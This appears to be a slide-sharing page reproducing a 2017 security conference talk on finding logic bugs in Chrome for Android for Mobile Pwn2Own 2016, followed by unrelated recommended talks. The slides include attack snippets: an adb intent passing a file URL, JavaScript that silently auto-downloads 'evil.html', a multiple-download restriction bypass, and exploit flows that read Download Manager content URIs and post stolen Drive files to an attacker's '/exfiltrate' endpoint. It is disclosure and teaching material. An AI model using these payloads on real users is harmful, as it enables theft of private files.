logic bug hunting in chrome on android
play

Logic Bug Hunting in Chrome on Android Infiltrate 17 April, 2017 - PowerPoint PPT Presentation

Sep 05, 2023 •526 likes •1.07k views

Logic Bug Hunting in Chrome on Android Infiltrate 17 April, 2017 Agenda Fuzzing and memory corruptions Introduction to logic flaws General approach to hunting logic bugs Application in Mobile Pwn2Own 2016 Exploit improvement

  1. Logic Bug Hunting in Chrome on Android Infiltrate 17 April, 2017

  2. Agenda • Fuzzing and memory corruptions • Introduction to logic flaws • General approach to hunting logic bugs • Application in Mobile Pwn2Own 2016 • Exploit improvement

  3. Tindroductions

  4. Fuzzing and Pwn2Own • Fuzzing has become mainstream • AFL, LibFuzzer, Radamsa, Honggfuzz, etc. • It’s almost too easy… • People find and kill bugs they rarely understand… • Increasing likelihood of duplicates • libstagefright, Chrome, etc. • Code changes • Improved exploit mitigations

  5. Android Mitigations • More and better security mechanisms • Improved rights management, SELinux, TrustZone • ASLR, DEP, PIE, RELRO, PartitionAlloc, Improved GC • Significant increase in exploit development time • Multiple bugs are usually chained together • PoC isn’t enough for the competition • We can’t afford spending too much time on Pwn2Own

  6. Memory Corruptions vs. Logic Flaws • Memory corruptions • Programming errors • Memory safety violations • Architecture-dependent • General mitigations • Logic flaws • Design vulnerabilities • Intended behaviour • Architecture-agnostic • Lack of general mitigation mechanisms

  7. We Love Logic Bugs • Equally beautiful and hilarious vectors • Basic tools • Actual exploits might be somewhat convoluted Q: How many bugs do you have in your chain? A: We abuse one and a half features. Q: What tool did you use to find that bug? A: Notepad.

  8. It’s not just us…

  9. Identifying Logic Flaws • I don’t know what I’m doing… • Lack of one-size-fits-all methodology • Thou shalt know thy target • Less known or obscure features • Trust boundaries and boundary violations • Threat modelling

  10. Mobile Pwn2Own 2016

  11. Mobile Pwn2Own 2016

  12. Mobile Pwn2Own 2016 ✘

  13. Mobile Pwn2Own 2016 Category Phone Price (USD) Apple iPhone $50,000 Obtaining Sensitive Google Nexus $50,000 Information Samsung Galaxy $35,000 Apple iPhone $125,000 Install Rogue Google Nexus $100,000 Application Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000 “All entries must compromise the devices by browsing to web content […] or by viewing/receiving an MMS/SMS message .” http://zerodayinitiative.com/MobilePwn2Own2016Rules.html

  14. Where do we start? • Ruling out SMS/MMS • Limited to media rendering bugs • Chrome • Core components • URI handlers • IPC to other applications

  15. Google Admin • Case study from 2015

  16. Google Admin <activity android:name="com.google.android.apps. enterprise.cpanel.activities.ResetPinActivity"> <intent-filter> <action android:name="android.intent.action.VIEW"/> <category android:name="android.intent.category.DEFAULT"/> <category android:name="android.intent.category.BROWSABLE"/> <data android:host="localhost" android:scheme="http"/> </intent-filter> </activity> AndroidManifest.xml

  17. Google Admin public void onCreate(Bundle arg3) { this .c = this .getIntent().getExtras().getString("setup_url"); this .b.loadUrl( this .c); // ... } ResetPinActivity.java

  18. Google Admin • Attacking with malware adb shell am start \ – d http://localhost/foo \ -e setup_url file:////data/data/com.malware/file.html

  19. Google Admin Chrome < HTML >< BODY > < IFRAME SRC="file:///tmp/foo.html" id="foo" onLoad="console.log(document.getElementById('foo').contentDocument.body.innerHTML);"> </ IFRAME > </ BODY ></ HTML > file:///tmp/foo.html Uncaught DOMException: Blocked a frame with origin "null" from accessing a cross-origin frame.

  20. Google Admin Chrome on Android API 17 < HTML >< BODY > < IFRAME SRC="file:///sdcard/foo.html" id="foo" onLoad="console.log(document.getelementById('foo').contentDocument.body.innerHTML);"> </ IFRAME > </ BODY ></ HTML > file:///sdcard/foo.html Yep, that’s fine!

  21. Google Admin • Malicious app creates a world readable file, e.g. foo.html • foo.html will load an iframe with src = “foo.html” after a small delay • Sends a URL for foo.html to Google Admin via IPC • Change foo.html to be a symbolic link pointing to a file in the Google Admin’s sandbox • Post file contents back to a web server

  22. Same-Origin Policy • Chrome for Android vs. Chrome • Different SOP • Custom Android schemes • Worth investigating…

  23. SOP in Chrome for Android HTTP / HTTPS Scheme, domain and port number must match. Full file path for origin until API 23. Starting with API 24, all origins are FILE now NULL. CONTENT Scheme, domain and port number must match. DATA All origins are NULL.

  24. Jumping Origins Destination Scheme HTTP / HTTPS FILE CONTENT DATA ✓ ✘ ✓ ✓ HTTP / HTTPS Source Scheme ✓ ✓ ✓ ✓ FILE ✓ ✘ ✓ ✓ CONTENT ✓ ✘ ✓ ✓ DATA

  25. Android Content Providers • Implement data repositories • Exportable for external access • Declared in AndroidManifest.xml • Read and write access control • Content URIs • Combination of ‘authority’ and ‘path’ • content://<authority><path> • content://downloads/my_downloads/45 • What about SOP?

  26. Android Download Manager • System service that handles long-running HTTP downloads • Back to SOP… content://downloads/my_downloads/45 content://downloads/my_downloads/46 content://downloads/my_downloads/102

  27. Automatic File Downloads • Thank you, HTML5! • Confirmed to work in Chrome • <a href =“foo.html” download > • <a href =“foo.html” download =“bar.html"> • Zero user interaction • Link click using JavaScript • Perfect for Pwn2Own

  28. Automatic File Downloads < a id='foo' href='evil.html' download> link </ a > < script > document.getElementById('foo').click(); </ script >

  29. Exploit #1 – Stealing Downloaded Files Attacker’s Android Victim’s Web Server Download Manager Browser GET /index.html index.html GET /evil.html evil.html (download) evil.html (download) GET my_downloads/54 evil.html GET my_downloads/53 secrets.pdf secrets.pdf

  30. Mobile Pwn2Own 2016 Category Phone Price (USD) Apple iPhone $50,000 Obtaining Sensitive Google Nexus $50,000 Information Samsung Galaxy $35,000 Apple iPhone $125,000 Install Rogue Application Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000

  31. Exploit Enhancement • Downloading arbitrary files • User sessions < a id='foo' href='https://drive.google.com/my_drive.html' download> link </ a > < script > document.getElementById('foo').click(); </ script >

  32. Multiple File Downloads • Multiple automatic downloads from the same page are forbidden

  33. Multiple File Downloads Restriction Bypass • However… < meta http-equiv="refresh" content="0; url=page2.html" /> page1.html < script > window.history.back(); </ script > page2.html

  34. Exploit #2 – Stealing Google Drive Files Attacker’s Android Victim’s Google Drive Web Server Download Manager Browser Web Server evil.html (download) GET my_downloads/54 evil.html GET /my_drive.html my_drive.html my_drive.html (download) (download) GET my_downloads/55 my_drive.html GET /bounce.html bounce.html history.back(); GET /img?id=12345678 img_foo.jpg img_foo.jpg (download) (download) GET my_downloads/56 my_drive.html POST /exfiltrate

  35. LLL TTT TTT TTT LL LLL L T TTT TT TTT TTT LLL TTT TTT TTT mMMMm.mM mMMMm.mMMm Mm. . AAAAa AAAAa. LLL .cCCCCc cCCCCc .oOOo oOOo. NNNNNn NNn. TTTTTT .eEEe eEEe. . NNNNNn. TTTTTT MMM "MMM MMM "MMM " "MMm MMm "AAa AAa LLL cCCC" oOO oOO"" ""OOo NNN " "NNn NNn TTT eEE EEe EEe NNN "NNn TTT TTT MMM MMM MMM MMM MMM MMM .aAAAAAA aAAAAAA LLL ====== CCC OOO OOO NNN NNN NNN TTT EEEEEEEE NNN NNN TTT TTT MMM MMM MMM MMM MMM MMM AAA AAA AAA AAA LLL CCCc. oOO oOO.. ..OOo NNN NNN NNN tTTt. . EEe. NNN NNN TTTt TTTt. . MMM MMM MMM MMM MMM MMM "YAAAAAA "YAAAAAA LLL LLL " "CCCCCc CCCCCc "O "OOO OOO" N O" NNN NN NNN NNN "tTT TTT "EE EEEE EEE E NNN NNN NNN NNN "TTTT "TTTT

  36. Drive Files Download Demo

  37. Mobile Pwn2Own 2016 Category Phone Price (USD) Apple iPhone $50,000 Obtaining Sensitive Google Nexus $50,000 Information Samsung Galaxy $35,000 Apple iPhone $125,000 Install Rogue Application Google Nexus $100,000 Samsung Galaxy $60,000 Force Phone Unlock Apple iPhone $250,000

  38. Bettererer Exploit • We can also make POST requests • Download pages containing CSRF token • Use CSRF token in POST request • We’ve got everything now…

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017 Agenda Fuzzing and memory

Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017 Agenda Fuzzing and memory

Logic Bug Hunting in Chrome on Android CanSecWest 17 March, 2017 Agenda Fuzzing and memory corruptions Introduction to logic flaws General approach to hunting logic bugs Application in Mobile Pwn2Own 2016 Exploit improvement

963 views • 73 slides
Running Android in a Container How the play store runs on Chrome OS How Android Runs On Chrome

Running Android in a Container How the play store runs on Chrome OS How Android Runs On Chrome

Running Android in a Container How the play store runs on Chrome OS How Android Runs On Chrome OS Chrome Graphics Buffer (Prime FD) Android IPC IPC Chrome IPC Binder System Bridge Bridge (*/init*) Input Events network config, GL,

296 views • 10 slides
a C h r o m e b o o k t o o Maksim Lin Freelance Android &amp; Chrome App Developer

a C h r o m e b o o k t o o Maksim Lin Freelance Android &amp; Chrome App Developer

Oh the things you could do if you had a C h r o m e b o o k t o o Maksim Lin Freelance Android &amp; Chrome App Developer www.manichord.com So what are Chromebooks, ChromeOS And Chrome (Packaged) Apps? Chromebooks (and

612 views • 28 slides
5. Note two things, the box now says, Added to Chrome. Notice the Blue box with an S (for Snagit)

5. Note two things, the box now says, Added to Chrome. Notice the Blue box with an S (for Snagit)

Snagit for Google Chrome: Instructions IMPORTANT. You will need to be in Chrome and Not on Chrome for this app to work. (go to Chrome first, then go to whatever site you plan to screencast.) 1. Open Chrome, Type in Snagit for Chrome.

184 views • 3 slides
Stetho: using Dev Tools for native app debugging Maksim Lin Freelance Android Developer

Stetho: using Dev Tools for native app debugging Maksim Lin Freelance Android Developer

Stetho: using Dev Tools for native app debugging Maksim Lin Freelance Android Developer www.manichord.com Chrome Dev Tools ( aka F12 ) ? What is Stetho ? Android library project from Facebook Implements Chrome DevTools Protocol

500 views • 14 slides
Samba and Chrome OS the Start of a beautiful Friendship Lutz Justen ljusten@google.com sambaXP,

Samba and Chrome OS the Start of a beautiful Friendship Lutz Justen ljusten@google.com sambaXP,

Samba and Chrome OS the Start of a beautiful Friendship Lutz Justen ljusten@google.com sambaXP, Gttingen June 06, 2018 Topics Chrome OS and Chromebooks Active Directory Integration How it works, management, Android apps, certificates,

774 views • 45 slides
Polished Droids: Bringing Android Apps to Chromebooks Maksim Lin Freelance Android Developer

Polished Droids: Bringing Android Apps to Chromebooks Maksim Lin Freelance Android Developer

Polished Droids: Bringing Android Apps to Chromebooks Maksim Lin Freelance Android Developer www.manichord.com Chromebooks ? Background Freelance Android and AOSP dev ~ 5 yrs Use and Chromebooks ~ 4yrs Wrote Git client Chrome

339 views • 31 slides
Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting

Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting

Hunting Manufactures and distributes products that enable the extraction of oil and gas Hunting PLC Global Footprint 2 2009 Corporate Highlights Completed three acquisitions 47.3m Sale of Hunting Energy France 11.1m Year end

857 views • 37 slides
Revisiting the Chrome Extension Permissions Model Pranav Prakash, Chester Leung 1 Courtesy of

Revisiting the Chrome Extension Permissions Model Pranav Prakash, Chester Leung 1 Courtesy of

Revisiting the Chrome Extension Permissions Model Pranav Prakash, Chester Leung 1 Courtesy of W3Counter 2 Courtesy of W3Counter 3 Chrome has ~190,000 Google Chrome extensions released 2010 2020 2008 2019 Chrome adds Chrome removes

1.07k views • 105 slides
Waterfowl Hunting for Beginners by John Martsh R-3 Program Manager Hunting Techniques: Spot and

Waterfowl Hunting for Beginners by John Martsh R-3 Program Manager Hunting Techniques: Spot and

Waterfowl Hunting for Beginners by John Martsh R-3 Program Manager Hunting Techniques: Spot and Stalk Hunting Techniques: Decoying Hunting Techniques: Pass Shooting Gauge Sizes Choke extracted from muzzle Choke lengths and wall diameters

783 views • 29 slides
Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine About Me Natalie

Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine About Me Natalie

Your Chakra Is Not Aligned Hunting bugs in the Microsoft Edge Script Engine About Me Natalie Silvanovich AKA natashenka Project Zero member Previously did mobile security on Android and BlackBerry ECMAScript enthusiast

893 views • 39 slides
Developers Google Maps Android API v2 Make your Android app pop with Google Maps Android API v2

Developers Google Maps Android API v2 Make your Android app pop with Google Maps Android API v2

Developers Google Maps Android API v2 Make your Android app pop with Google Maps Android API v2 Anthony Morris Jan-Felix Schmakeit Tech Lead, Android Maps API Android Developer Relations Code, Slides, Worksheet: http://goo.gl/MfY67 Welcome!

687 views • 49 slides
A Safe and Stateless Platform - Introduction to Google Chrome OS Security model Google Chrome

A Safe and Stateless Platform - Introduction to Google Chrome OS Security model Google Chrome

A Safe and Stateless Platform - Introduction to Google Chrome OS Security model Google Chrome OS Speed Security - Verified boot Security - Reboot to recover Security for the internet age Current Operating Systems Chrome OS Apps have

424 views • 8 slides
Hex Chrome Exposures from Hex Chrome Exposures from Metal Cladding Work in a Boiler O t b

Hex Chrome Exposures from Hex Chrome Exposures from Metal Cladding Work in a Boiler O t b

Hex Chrome Exposures from Hex Chrome Exposures from Metal Cladding Work in a Boiler O t b October 2012 2012 Luminant Corporate Safety David Friedman, CIH, MSPH, ARM Background Information Situation occurred at a lignite plant in Central

495 views • 25 slides
Introduction to Android Development What is Android? Android is the customizable, easy to

Introduction to Android Development What is Android? Android is the customizable, easy to

Introduction to Android Development What is Android? Android is the customizable, easy to use operating system that powers more than a billion devices across the globe - from phones and tablets to watches, TV, cars and more to come.

464 views • 21 slides
CS619 Android 101 BENCE CSERNA Android: Manifest example Android: Manifest &lt;manifest

CS619 Android 101 BENCE CSERNA Android: Manifest example Android: Manifest &lt;manifest

Project #1: Color Guess Game CS619 Android 101 BENCE CSERNA Android: Manifest example Android: Manifest &lt;manifest xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot; package=&quot;net.cserna.bence.colorguess

201 views • 3 slides
Graph-based timespace trade-offs for approximate near neighbors Thijs Laarhoven

Graph-based timespace trade-offs for approximate near neighbors Thijs Laarhoven

Graph-based timespace trade-offs for approximate near neighbors Thijs Laarhoven mail@thijs.com http://thijs.com/ SoCG 2018 , Budapest, Hungary (June 13, 2018) Nearest neighbor searching Nearest neighbor problem Problem description

1.06k views • 67 slides
Matched T-Test Cohen Chapter 11 For EDUC/PSY 6600 1 we are suffering from a plethora of

Matched T-Test Cohen Chapter 11 For EDUC/PSY 6600 1 we are suffering from a plethora of

Matched T-Test Cohen Chapter 11 For EDUC/PSY 6600 1 we are suffering from a plethora of surmise, conjecture, and hypothesis. The difficulty is to detach the framework of fact of absolute undeniable fact from the embellishments of

677 views • 20 slides
Using iRODS in Sugar deployments Tony Anderson Volunteer, OLPC + Sugar Labs Kigali (Rwanda)

Using iRODS in Sugar deployments Tony Anderson Volunteer, OLPC + Sugar Labs Kigali (Rwanda)

Using iRODS in Sugar deployments Tony Anderson Volunteer, OLPC + Sugar Labs Kigali (Rwanda) Public Library http://schoolserver Journal View Problem All user's work is stored in Journal When unused storage is &lt; 50MB, user reinstalls

431 views • 14 slides
Sterile neutrino searches at future colliders Stefan Antusch University of Basel

Sterile neutrino searches at future colliders Stefan Antusch University of Basel

Sterile neutrino searches at future colliders Stefan Antusch University of Basel Max-Planck-Institut fr Physik Department of Physics (Werner-Heisenberg-Institut) NUFACT2017, Uppsala September 28, 2017 One of the big open questions in BSM

496 views • 47 slides
Bochspwn Revolutions Further Advancements in Detecting Kernel Infoleaks with x86 Emulation

Bochspwn Revolutions Further Advancements in Detecting Kernel Infoleaks with x86 Emulation

Bochspwn Revolutions Further Advancements in Detecting Kernel Infoleaks with x86 Emulation Mateusz Jurczyk (@j00ru) INFILTRATE 2018, Miami Agenda Short recap of kernel infoleaks and Bochspwn Reloaded for x86 guests Implementing x64 guest

1.13k views • 101 slides
Storm Water Utility Fee Apportionment for the City of Birmingham Storm Water Overview Legal

Storm Water Utility Fee Apportionment for the City of Birmingham Storm Water Overview Legal

Storm Water Utility Fee Apportionment for the City of Birmingham Storm Water Overview Legal Considerations Tim Currier, City Attorney How rates are calculated Mark Gerber, Finance Director Apportionment Report James

756 views • 30 slides
Comics to Consoles Antony Johnston Games &amp; Comics: Commonalities Interactive

Comics to Consoles Antony Johnston Games &amp; Comics: Commonalities Interactive

Comics to Consoles Antony Johnston Games &amp; Comics: Commonalities Interactive Outcast Media Abstraction of both Iconography &amp; Activity Audience controls the pace of experience A Brief Word On Concept (...Or, why

689 views • 57 slides
Evolving Cyber Risks for Small Businesses Sponsored By: Evolving Cyber Risks for Small

Evolving Cyber Risks for Small Businesses Sponsored By: Evolving Cyber Risks for Small

Evolving Cyber Risks for Small Businesses Sponsored By: Evolving Cyber Risks for Small Businesses Visit www.advisenltd.com at the end of this webinar to download: Copy of these slides Recording of todays webinar Corresponding

515 views • 19 slides

More recommend